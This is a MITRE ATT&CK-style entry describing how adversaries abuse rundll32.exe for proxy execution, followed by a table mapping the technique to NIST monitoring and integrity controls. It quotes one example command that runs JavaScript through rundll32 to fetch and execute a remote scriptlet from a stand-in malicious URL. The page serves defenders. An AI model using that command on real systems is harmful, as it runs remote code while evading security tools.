T1218.011 Rundll32 Mappings

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)



Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name
CA-7 Continuous Monitoring Protects T1218.011 Rundll32
SI-10 Information Input Validation Protects T1218.011 Rundll32
SI-4 System Monitoring Protects T1218.011 Rundll32
SI-7 Software, Firmware, and Information Integrity Protects T1218.011 Rundll32
alerts_for_windows_machines Alerts for Windows Machines technique_scores T1218.011 Rundll32